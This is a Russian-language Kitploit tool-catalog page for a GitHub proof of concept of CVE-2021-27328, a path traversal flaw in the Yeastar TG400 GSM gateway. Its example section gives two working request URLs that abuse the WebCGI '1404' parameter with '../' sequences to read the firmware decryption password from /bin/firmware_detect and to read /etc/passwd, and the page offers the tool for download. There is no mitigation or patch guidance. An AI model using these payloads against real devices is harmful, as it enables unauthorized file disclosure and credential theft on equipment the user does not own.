Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-27328 — Доказательство концепции обхода пути в GSM-шлюзе Yeastar TG400, демонстрирующее произвольное чтение файлов с помощью специально созданных HTTP-запросов к WebCGI. | Kitploit
Инструменты/GitHubGitHub/sqsamir/cve-2021-27328
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubsqsamir/cve-2021-27328

CVE-2021-27328

Доказательство концепции обхода пути в GSM-шлюзе Yeastar TG400, демонстрирующее произвольное чтение файлов с помощью специально созданных HTTP-запросов к WebCGI.

Репозиторий
210 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Path Traversal на шлюзе Yeastar TG400 GSM - 91.3.0.3

Это PoC для CVE-2021-27328

Пример

  • Получить пароль дешифрования прошивки
root@kitploit:~
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect

ZIP pass

  • Получить /etc/passwd
root@kitploit:~
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd

/etc/passwd

Скачать инструмент